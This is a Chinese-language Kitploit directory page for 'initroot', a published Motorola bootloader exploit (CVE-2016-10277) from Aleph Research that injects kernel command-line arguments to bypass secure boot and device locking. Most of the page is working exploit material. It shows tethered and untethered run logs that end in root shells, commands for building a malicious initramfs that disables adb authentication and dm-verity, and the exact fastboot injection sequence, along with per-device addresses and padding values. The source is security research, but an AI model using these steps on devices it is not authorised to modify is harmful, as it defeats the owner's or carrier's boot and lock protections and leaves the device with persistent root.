Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
initroot — Motorola 无系留越狱:利用 CVE-2016-10277 绕过安全启动和设备锁定 | Kitploit
工具/GitHubGitHub/alephsecurity/initroot
Android安全权限提升持久化机制漏洞分析漏洞利用移动安全Payload 开发二进制利用
GitHubalephsecurity/initroot

initroot

Motorola 无系留越狱:利用 CVE-2016-10277 绕过安全启动和设备锁定

查看仓库
8424179年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

initroot:摩托罗拉引导加载程序内核命令行注入安全启动与设备锁定绕过 (CVE-2016-10277)

作者:Roee Hay / Aleph Research, HCL Technologies

第一阶段漏洞利用:临时越狱

该漏洞利用可在设备上获得临时的无限制 root 访问权限。 例如,在 cedric 上(部分消息已移除以提高可读性):

$ cd ./tethered/cedric
$ ./initroot-tethered.sh
Welcome to initroot-cedric-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0xA2100000,1588596
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (34319 KB)...
OKAY [  1.098s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.101s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:shell:s0
$ adb shell
cedric:/ # 

第二阶段漏洞利用:非临时越狱

该漏洞利用可在设备上获得持久的 root 访问权限。 例如,在 athene 上(部分消息已移除以提高可读性):

$ cd ./untethered/athene
$ ./initroot-untethered.sh 
Welcome to initroot-athene-untethered
Welcome to initroot-athene-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x92000000,2505052
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (35214 KB)...
OKAY [  1.131s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.138s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
padC-initroot: 1 file pushed. 11.1 MB/s (22937600 bytes in 1.963s)
44800+0 records in
44800+0 records out
22937600 bytes transferred in 3.017 secs (7602784 bytes/sec)
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a rdinit= root=/dev/mmcblk0p41
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
rebooting...

finished. total time: 0.815s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # 

生成自己的恶意 initramfs 归档

  1. 使用已提交的 initroot-<device>.cpio.gz,或自行生成:
$ cd <initramfs folder>
$ find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../initroot-<device>.cpio.gz
OR if padding is needed:
$ dd if=/dev/zero of=../pad ibs=1 count=<PAD_SIZE>
$ cp ../pad ../initroot-<device>.cpio.gz && find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../tmp && ls -la ../tmp && cat ../tmp >> ../initroot-<device>.cpio.gz  && rm -fr ../tmp
$ cd ..
  1. 我们提交的 initramfs 镜像默认以 root 身份运行 adb。它不会请求授权。此外,相关分区上的 dm-verity 已被禁用。
fastboot oem config fsg-id "a initrd=<SCRATCH_ADDR+PAD_SIZE>,<initroot.cpio.gz size-PAD_SIZE>"`
fastboot flash foo initroot-<device>.cpio.gz`
fastboot continue
  1. 如果你使用我们的 initramfs,adb shell 现在会给你一个 root shell:
$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0

为其他 Moto 设备创建非临时漏洞利用

阅读我们的博客文章

已验证设备

设备代号SCRATCH_ADDRPADDING已提交的 initrams未使用分区
Nexus 6shamu0x110000000x0AOSP userdebugmmcblk0p11
Moto G5 (XT1676)cedric0xA01000000x2000000Release,已修补 init 和 adbd 以禁用 SELinux,set{u,g}id 到 shell,capabilities 丢弃及 adb 认证等mmcblk0p41
Moto G4 (XT1622)athene0x900000000x2000000""mmcblk0p48

社区报告

设备代号SCRATCH_ADDR报告者描述
Moto G5 Pluspotter0xA0100000drbeat注入引导属性。[证据]
Moto G4 Play (XT1607)harpia0x90000000m-mullins完全利用 Amazon XT1607。[证据]
Moto G4 Play (XT1609)harpia0x90000000@utoprime完全利用 Verizon XT1609。[证据]
Moto G4 (XT1625)athene0x90000000@EWorcel注入 initrd 导致启动循环。[证据]
Moto G3osprey0x90000000@asiekierka注入 initrd 导致启动循环。[证据]
Moto G2 (XT1072)thea0x11000000@TheElix注入 initrd 导致启动循环。[证据]
Moto G (XT1032)falcon_retfr0x11000000Pierre Zurek使用 64MB 填充完全利用[证据]
Moto E (XT830C)condor_cdma0x0E000000fetcher使用 32MB 填充完全利用锁定到 Tracfone/Verizon 的 XT830C[证据]
其他--@jcase[证据]

注意

此漏洞也可能影响其他摩托罗拉设备:将需要不同的 initramfs。不同的 initrd 物理地址(SCRATCH_ADDR)。PADDING 也可能有所不同。

视频演示

CVE-2016-10277 视频演示

出版物

  1. initroot:通过内核命令行注入绕过 Nexus 6 安全启动
  2. initroot:你好 Moto
  3. 摩托罗拉 Android 引导加载程序内核命令行注入安全启动绕过
  4. 非临时 initroot (USENIX WOOT '17)
  5. USENIX WOOT '17 论文
下载工具